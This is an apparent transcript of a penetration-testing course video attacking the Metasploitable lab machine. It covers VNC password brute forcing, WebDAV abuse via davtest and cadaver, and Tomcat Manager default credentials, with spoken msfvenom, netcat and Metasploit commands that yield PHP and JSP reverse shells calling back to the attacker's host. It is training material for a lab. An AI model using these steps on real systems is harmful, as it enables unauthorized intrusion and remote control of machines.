What's up, guys? Welcome to Module 5, Attacking Metasploitable Part 3. So as you might have guessed, there are a few things that I still want to cover about Metasploitable before we move on. For one, I'd like to talk about VNC brute forcing and exploitation of poorly configured credentials. This doesn't just apply to VNC. This can apply to any number of services, and the practices that we're showing here are super important. So first, we're going to be exploiting VNC with some poor credentials, and we're going to be exploring sec lists and how we can utilize some of those files. It's the most useful repository of, well, word lists that exists in the world of cybersecurity. And we're going to take a look at that too with VNC on port 5900. So the second thing we're going to be covering is WebDAV. Now, WebDAV is used by a lot of developers, and it's an extremely important service to be able to know how to exploit, how to connect to, how to exploit misconfigurations, so on and so forth. Why? Why? Might be asking Siren why. It's simple. There are these internal environments that developers will love to work inside organizations and enterprises off of that network, just off of that grid. And, we pivot into those environments. We hack through those firewalls. We pivot into those and we exfiltrate with some more advanced techniques. We exfiltrate information from various ports and services that would only normally be accessible or configured to be accessible from an internal network, right? Well, WebDAV is used a lot by developers because when you're in those internal networks, you're developing what? Internal and in-house applications in a secure fashion. Thing is, if a hacker is able to access port 80 through that or any HTTP traffic and tunnel it out, like we will eventually do down the line, then we can tunnel out 80 and gain access to WebDAV and so on and so forth. It's pretty useful because it allows developers to remotely manage, edit, and share files on a web server. So yeah, the last but not least, we're going to be exploiting a little thing known as Apache Tomcat, utilizing a malicious.war payload, which is pretty kick-ass, pretty badass if you ask me. So we're going to be getting down to business to do that, and let's go ahead and get started. I'm going to export my IP, go to 192.168.1.23, and that is the target Metasploitable machine. Nmap-P5900 at the target IP tac open. It's open. Nmap-P5900-SV service version at the target IP tac open. Excellent. What about -ST? Nice. So, we've got some cool stuff going on there. It's definitely open. It's definitely running. What we're going to use is a little technique known as brute forcing. Everyone knows about it. It's pretty basic. We're throwing credentials at a service to try and get an authenticated login. But before we do that, port 5900 is commonly associated with VNC. So VNC stands for Virtual Network Computing. It's basically remote desktop. It's like if you're familiar with RDP, basically, think RDP. It's a lot like RDP. All right, let's do it. I'm going to open up a new terminal, and I'm going to connect to it. Well, first I'm going to export IP equal to 192.168.1.23, and I'm going to use VNC Viewer at the target IP. Oh, no. No password. Can't authenticate. We're going to have to use something called an auxiliary module with an MSF or Metasploit. So notice how we have 2,420 exploits, 1,248 auxiliary modules. These are more scanning, gathering of intelligence, and 423 post, which is really a lot like an auxiliary module. Scanning, gathering of intelligence, enumeration. But these are loaded into a interpreter session after you've exploited the machine, hence post. So what we're going to do is, search auxiliary, right? We want to find that. Oh my God, that's a lot. What if we just search AUX? That's still the same amount. What if we search VNC? Well, goodness gracious, that's a lot too. 155? Oh man. What if we search VNC AUX? That's a lot better. So we have an auxiliary scanner, server capture, admin VNC, VNC 41 bypass. In 2019, we had an HTTP thin VNC traversal. And then we have an auxiliary scanner, information gathering, etc. What we want to do is use auxiliary scanner VNC login. And I'm going to type options. Hooray, we're presented with a bunch of options. But dude, I know what you're thinking. Options are great. Parameters, values. But it doesn't tell me anything about what it does. Let's type info. Description. This module will test a VNC server on a range of machines and report successful logins. Currently, it supports RFB protocol, versions 3.3, 3.7, 3.8, and 4.001 using the VNC challenge response authentication method. Whew. That's pretty kick-ass. So what we're going to do is take a look at, what username it wants to use here. Right now it's blank. What should we use? Let's go back to our enumeration. Remember how we have the user root here? Where did we get that from? Port 25, SMTP. Remember when we did netcat, netverbose to the target IP on port 25 and verified that root was a real, or VRFY root is a real user? Well, we're going to set the username to root. And if we take a look at this pass file, let's cat in our second terminal, let's cat user share Metasploit framework data, and then wordless VNC passwords. Why? Because I want to know what's inside it. Wait, that's it? That's all that's in there? You've got to be kidding me. What if I encounter like 10 or something, 10 machines in an engagement with 30 machines on a Class C network, and the password's not password? This is not acceptable. This is not acceptable. So we need to go to our trusty source, Secless. Check it out. It's the most important word list on the internet as far as you are concerned with regards to cybersecurity and offensive security. Discovery, fuzzing, IOCs, miscellaneous, passwords, pattern matching, payloads, usernames, web shells, and under fuzzing, a lot. Under discovery, a lot. Long story short, go to code, grab it, cd to your optional directory if it's not already present in like user share seclist. It's not on my machine, but you would sudo git clone this and make sure you do that to your optional directory. Great. I've already got it, so we're going to continue on. What I'm going to do is cd into seclist and then go to passwords and list this out. I'm interested in Zato net 10 million passwords 1000 because I want to send like the top 1000. I don't want it to be too heavy on traffic with like 10,000 passwords. That's just ridiculous. So what I'm going to do, I mean, unless the 1,000 didn't work and we had a long engagement and we were whitelisted, you're going to hear a lot of these terms thrown around throughout these modules. And I promise you, they might not make sense right now, but they will in your future. And if you don't understand what I mean, please, dear God, just Google it. Because it is incredibly important and pertinent information to your success. And yeah. So in my methodology, I'm always checking these word lists. I'm checking them to see if they are applicable towards my target service, applicable towards my target environment, target organization, or enterprise. May have to make custom word lists to be catered towards the target organization or enterprise or target web application, whatever it might be. We might have to do that kind of a thing. So what I'm going to do is copy this long string here, and I'm going to say set pass file up here, pass file to /opt seclist, and then passwords and ZatoNet 10 million passwords top 1000.txt. And with that, let's clear it out. I'm going to clear out everything down here as well to keep things nice and clean. We'll type options and just go over everything one more time. Oh, we're missing the remote hosts. Let's type in our target, 192.168.1.23. This could be .23 through 255, but we're targeting a single machine. So I'm going to clear this. We're going to type spool to output.txt. And if we type pwd, that's in home Cali. So if we cd to our home directory, then after we type run, it'll do all the output, and then we can play with it, we can grep it, we can search through it, etc. It's really useful if you want to analyze verbose output of an exploit in Metasploit. So let's go ahead and type run and let that go. And let that go, and so on and so forth. And then let's cat output.txt. And you can see we've got pretty much everything here. And we can scroll all the way to the top. And, we have no database active. That's fine. So what I've done here is just cleared that output. We're going to move this to the top. There's our little auxiliary scanner, enumeration gatherer. We're going to cat output.txt. And look, we have a bunch of login failed. But what if we pipe all of that output to grep-i? And why do I say -i? Because this is really, really important, because you're going to be grepping through a crap ton of, a metric crap ton of information that you exfiltrate from target machines. And knowing how to grep is important. This just means case insensitivity. It's saying grep, I don't care if it's capital or lowercase. I just want to find success. Boom. We had one. Yeah, it was password. Sure, it was password. It would have worked technically with the default login there. But the point is, we've learned how to configure an actual word list of our own. We've learned how to configure, through VNC, we've configured our own word list. We've done more. We've done more than just exploit port 5900 for VNC misconfigurations. We've learned about seclists as well. We've learned that when playing or when working with Metasploit, we can use the spool command to output everything to a file for analysis, at a later time. That's incredibly useful when you get lots of output, right? So I am going to just say, we've learned quite a bit. Let's go ahead and hit clear. And I'm going to use Control-Shift down arrow on my keyboard and bring this back into a nice and concise position. And now that we've got the password, let's go ahead and add that to our enumeration data. So for credentials, we have root VNC. We have, in proper credential format, VNCs. That's the protocol specified. And then space dash space, root, password. And let's go ahead and say VNC viewer at the target IP, password. Dude, nice. So we logged in. And we have you'll say this is like a lot like RDP. This is really fun. This is like remote desktop protocol, right? We've got root on the target machine. We can type TTY. We are the only shell on this machine, dev PTS 0. And yeah, isn't that pretty cool? We've got our own little shell here as root. That may be pretty hard to see. It's pretty hard to see for me. But nonetheless, I mean, look at what we got. Imagine if you were just doing this for some small business or some moderately sized business and they didn't know. They had an IT person who just came out with their computer science degree and they configured this. And guys, they don't know how to configure VNC. They just installed it for workplace convenience. Well, this is what that leads to. Exploitation of that, threat actors, like this is the kind of shizzle that they will do. And now we know how to do that too, right? So make sure, this is the type of stuff you would definitely want to include in a formal report. No doubt. Don't use default passwords. And then you can go from there in your mitigations and remediations. But yeah, we got a root shell on this. We can go to the root file system, list it out, no doubt. Who am I? ID, UID equals 0. That's root. We can now execute any command on this machine with impunity. Fearlessly. Like a spear, and every single one of those commands will go through without question. As of the time and date of actually connecting to this machine, this is why the attacker has the upper hand, right? Just to kind of I apologize to meander here, but sometimes people like it when I do some more explaining like this. It's that when we have root on a machine, we have the upper hand, not the defense. We have the ability to execute whatever we want out of the gate. That could be maintaining persistence. That could be rootkits. That could be... I've even heard of organizations these days that or small companies that are proving to these big guys, like, look at how bad ransomware can be, man. And they'll, out of the gate, install ransomware and be like, okay, now this is why you need backups. This is how you can get out of this situation, to provide a simulation to enterprises for hands-on ransomware attacks. And that's a valuable business idea too, right? To be able to show them how to mitigate those things from a defensive perspective. But the real core here is that, we've got root. That kind of power's in your hands. Use it responsibly. So we've exploited VNC. And as you might have guessed, we're going to exit out of MSF console. And we're going to clear this. And we're ready to move on to basically part 2 here, which is exploiting WebDAV. We're going to be examining 2 tools. I like to use 2 tools here. Cadaver and Davtest. Not in that order though. Taking a look at Davtest, I like to see if we can put files. So remember, with HTTP, we can do all kinds of things. We can do the most common things like get and post, but we can also do trace. And we can also do options. We can do put. We can do delete. We can do quite a few things. And being that we can do a few things, we're going to look to see if with Davtest, it's basically just going to try and put a plethora of extensions, file extensions, web stacks, and web technologies up there. And I'll do a lot of talking about it, but let's show you what I mean. So I'm going to type davtest-url http at the target IP 192.168.1.23/dav is where that's going to be. If you wanted to fuzz this, you certainly could. Like, I can show you that. Let's export IP equal to 192.168.1.23. And, you know, then I'll go to my common and I'll type in, or rather I'll use large words, and now I'll export a URL to equal HTTP. We're going to be doing this a lot. .168.1.23/fuzz. I want to know what else is there other than this. Yeah, WebDAV is here. Fantastic. And we could find that through the web browser, but what if we can't? What if we can't? That's where wfuzz comes in. So usually in order of things, you would first wfuzz, then you would use something like Davtest if you found it. And that's why I'm going to show you how to use wfuzz. So wfuzz requires a URL with a fuzz. It literally requires fuzz. That's the most basic explanation I can give. And we can specify wfuzz-c, I want color in my output, -z, what's the data input method, file, comma, and then you'd really better commit this to memory. It doesn't have to be now, but you'll do it, in time. Get in the habit of this. Opt seclist discovery web content raft large words.txt, because we're going to be doing this really quickly with a lot of machines in Slayer Labs that have HTTP and web ports, so please know how to do this. And then, do we want, 99,999 error responses? No. We want to be surgical with it, so we're going to hush the code 404. And I like to do one return key of it, and if there's a lot of erroneous output, I'll Control-C out of it and then do -HH and suppress based upon the number of characters that come back. But let's kind of just let this go and see if we can find anything else. Like, look, actually, forget it. Forget that. Let's do this side by side. What about /php info? Boom. We found /php info. What about server status? Well, that's a 403. That won't come back. Did we need the index to find phpMyAdmin? Here's phpMyAdmin. Great, but what if that's not accessible? Well, it showed up here. Thank goodness wfuzz found it for us. php-info is what it found, and then it also found phpMyAdmin. Boom. What else did it find? /test. That wasn't even on there. Test output. Goodness gracious. What else did we find on this web server? An index. Might that be... Yep, that's the index file. I think we also found twiki. Didn't we exploit that already? Yeah, we did. What about... there's what we're looking for. Dav. So let's say we wanted to clean that output. I don't want 403s either. Put a comma, hush code 404 and hush code 403. Now look at this. Check this out. We're We're getting 301s back. Those are useful. 200s back. Those are going to be useful here. And let's check for any 403s. What if a 403 comes back, or excuse me, what if well, let's see. What did DAV come back as? 301. So we can hush the 403 and there's our 301 DAV. I guess my point is with --HC or hush code, notice how we're not getting any 403s. We're just getting relevant output. I'm going to Control C this fuzzing because we're sending a lot. Fuzzing is probably the most... No, it's not probably. I'm going to be straightforward with you. The idea or concept of fuzzing is the literal most aggressive thing you can do in cybersecurity. Whether you're fuzzing IoT devices, whether you're fuzzing a tractor's firmware somehow, whether you're fuzzing a web application or web service, whether you're fuzzing server message block, it doesn't matter. You can fuzz and send random data in hopes of either getting a crash or returned output that is different and not expected. Like, that's the power of fuzzing. It's super useful. Please know what wfuzz is. Again, -color, -c, -file, and now you know why in my streams I always had common up so often with wfuzz. I could quickly fuzz directories with seclists, fuzz files. I want you to be able to fuzz directories, boom, copy with directories, copy with files, copy with large words, copy with users. I want you to be able to do that kind of a thing. Oh, you have a massive set of output, grep for IPs, but we're getting off track. Let's stick with DAV. So we found DAV the legitimate way through web fuzzing or directory busting. But yeah, we found DAV. And now we would open our browser and go to /DAV and see that there's nothing there and say, okay, I want to do Davtest at the target URL, http 192.168.1.23 / is it fuzz? No, it's DAV. And again, Davtest is going to go through and put a plethora of extensions and technologies on there. And hopefully, using the HTTP put method, you could also use HTTP trace, HTTP delete. Most commonly utilized in applications is get and post. But hey, I digress. We have davtest-URL there, and voila. Nice. So we have some successes in here that we need to look at. First off, the put method was successful for everything. Great. But even more successful than that, even greater than that, we have some successes on HTML execution and PHP execution and TXT. But PHP, that can execute system level commands. That's nice. I'm going to copy this address. In fact, I'm just going to refresh the page. There's our directory. Here's the plethora of web technologies. And here's the PHP file with an arbitrary command that got executed or echoed or whatever, right? That's cool. That means we have system level execution through a misconfigured DAV service or WebDAV service. However, we're not done yet. What about cadaver? Let's take a look. In fact, can I type cadaver --help? Yeah. So cadaver, you can type in the tolerant, allow CD and open. Like, this gets pretty legitimate. We could even open a shell with cadaver, and I'm going to show you how to do that. I mean, it is kind of extremely similar to Davtest, right? We use Davtest to put all those, but now we can use cadaver to just put HTTP 192. We don't have to specify anything. We just say HTTP and then our target 192.168.1.23, and then I'll put a / and it says connection to whatever closed, did not find a collection resource. Well, did we forget /dav? Yeah, we did. Now we're connected. I'm going to exit, clear that. That's the correct thing. Cadaver, http:// target IP /dav. Nice. Can I type ls? Yes, I can. And here's our successful DAV test. Pretty sweet. Pretty cool. But I don't have anything in here. Can I change directory in ls? Dude, cadaver is awesome. It's like being able to traverse in a shell, a pseudo shell, if you will. But a pseudo shell on the web. What if I type help? Oh, okay. So we can put files. That would make sense. Cadaver WebDAV protocol allows us to put files. So any WebDAV HTTP protocol should be expected here. Like being able to delete files, get, put. The list goes on. And then these other ones are pretty much like in-house built as a pseudo shell. But I'm interested. We're going to exit out of this for the time being. Pardon me. But we're going to exit out of that for the time being, and I'm going to clear the screen. Siren, what are you doing? We're going to use my Venom reference by typing venomref. I don't want to go to the internet for this. I just want to use it in here. And what we're going to do is use a PHP reverse PHP shell. I'm going to copy this, clear the screen, poor man's text editor with the £, msfvenom-p, that's for payload. And we're going to say PHP, reverse PHP, the listening host, which is going to be us, 192.168.1.233, on a listening port 1337, and our format is raw shell.php. And got to remove that £. And then we're going to try and upload a PHP reverse shell. And what does a reverse shell need? A reverse shell, fingers crossed, but a reverse shell is going to need a listening server. So we're going to use netcat to start one on 1337. Then we're going to go back to cadaver with the up arrows, /dav, and ls everything out here. And we're going to put shell.php. All right, that got uploaded. Now we need to execute it. I'm going to go back and refresh this. And it should be, nope, not there. What about here? There it is. In the root dav directory, shell.php. And if I execute this, we do get an incoming connection. And if I type ID, we do have a shell. Who am I? www data. Because we came in through the web as a web service that was not running as root. Nice. Nice. We can traverse to the root file system, and we can traverse to the home directory. I mean, we can view all the running processes. We've got code execution. Now, if I export, I can't clear, so I can export term equal to Linux and then type clear. It's not really working. This is kind of like a janky web shell, but at the same time, it's really useful to know that we can do these types of things. And there are definitely better ways of getting more stable shells, but I'm not complaining. Let's focus on the victory here, that we have code execution and we've exploited a service known as WebDAV. We first used wfuzz to discover /dav, right? What did we do? Recap. wfuzz to discover /dav. Then we used cadaver. So cadaver or Davtest. First we used Davtest to test what methods were allowed and what files could be placed. More specifically, what web technologies would execute? You know, that's the question we were asking. What web technologies or web stacks, whatever have you? Web tech, web stack. And then we used cadaver at http 192.168.1.23/dav. And we used cadaver to place a malicious PHP file that gave us a reverse shell. Result, code execution of a misconfigured WebDAV server. Bada boom, bada bang. So I'm going to clear out of the bottom and terminal and clear out of the top terminal. Feel free to read that over if you'd like. That being said, though, we are now ready to move on to the third portion, which is exploiting Apache Tomcat and Tomcat Manager. Basically, right now we're going to go back to where we had our WebDAV, and we're going to remove this URI and take a look. We've got PHP MyAdmin, TWiki, Multiday, DVWA, WebDAV. None of these are Tomcat, though, and Tomcat's in an HTTP serving port or server or service. Let's go to our nmap output, and let's scroll down to 80. Ooh, we have 89 Apache JServe, 8180 HTTP, Apache Tomcat Coyote JSP Engine 1.1. That's what I want to connect to. 8180. So instead of port 80, which would just take us back here, let's punch in :8180. Hello. We found our little cat, our Apache Tomcat. Nice. Now what we want to do is go to Tomcat Administration, right? No. We want to go to Tomcat Manager. And we're going to use the default credentials of Tomcat and Tomcat. And we're signed in. So there's that. If you're interested, you can always Google Tomcat default credentials or a list, like default credentials list. What are the default credentials? You know, root, Tomcat, root, Tor. I mean, there are a bunch, actually. I mean, there's really Tomcat, the better default pass list. Oh, hey, look. It's our good friend Secless. And look, there's a bunch of defaults. So if you ever encounter Tomcat in the wild, make sure you're using Secless, passwords, default credentials, Tomcat better default pass list.txt. But for now, we got in with Tomcat, good old fashioned. So what we want to do here, like, let's say we go to JSP examples, and this is like a little applet, a little application, right? What if I want to click on date and execute? Cool. So it's a program that executes, and we have date.jsp. So when working with this, our technology or stack is JSP or Java. That's what we're working with here. So let me ask you, the student, the question. What kind of payload do we want? It's Java. We want a Java payload. So we're going to type msfvenom --list payloads and grep-i for anywhere Java comes up. Let's see what we get. Okay. Java shell reverse TCP, the last one on the list. I kind of want something like that. Yeah, so I'm going to type msfvenom-p java /shell, or, well, we're working with JSP, aren't we? Java JSP, and we want it to be accurate. So what if we do something like payload Java JSP shell reverse TCP and say lhost is equal to 192.168.1. I don't know, let's say 233 us, that's our machine there. L port is going to equal 9090-F format for war, and output as, we'll call it shell.war. Cool. That's that. Payload size, 1098 bytes. Final size of the war file, 1098 bytes. We're going to Alt-Tab and go back to Tomcat Manager. And where do we upload it? Well, upload functionality is down here. War file to deploy. And we select Browse. And I'm going to go to Kali, the home directory, back into our temporary directory, TEMP. And we have our shell.php from earlier and our shell.war file. Let's open that shell.war file and click Deploy. And there it is. We have a file here that we can click on and it should execute. But before executing, let's set up a netcat listener in LVP on 9090. And click. Looks like we got a connection. Connect to 192.168.1.233 from unknown 192.168.1.23. And if we type ID, we're in as the group, or the user rather, Tomcat55, no group, but we have code execution. There's the root file system, export term equal to Linux, clear, PSAUX, clear, TTY, not a TTY, but nonetheless, we have code execution. Pretty nice, pretty nice, pretty nice. Out of curiosity, can I type dash? Yeah, I can. And we still got a shell, but not a TTY. In fact, I opened dash, I should be able to type exit and still be able to type. Bingo. So, long story short, we just made short work of Tomcat, and that was on port 8081. So that was exploitation of default credentials on port 8081, Tomcat Manager. And we're going to go here, go back, and copy this URL. It was on 8180. Let me clear this out. On port 8180. 8180. See, it's all these 8,000 ports. They can get you, kind of confused, but it can be confusing. 8180, Tomcat Manager. And then there it is, HTTP 192.168.1.23, 8180/manager HTML upload. And the first thing I think that comes to mind is, can we do default credentials? The first thing that comes to mind for me is default credentials. Can we do that? Those worked. Does the application support upload functionality? Yes, it does. What's the web stack? JSP, msfvenom, JSP reverse shell, -F or format as war, and output to shell.war, upload, separate terminal with netcat listening, verbose on 9090. Execute, the shell dot war application or applet shell received. Bling bling. And with that, guys, I'm going to hit exit one more time. And that's going to bring me out of my shell. And I would like to say, on behalf of Startup.Security, my name is Siren. Thank you for being here, and I look forward to catching you in the next module. Peace out, intruders.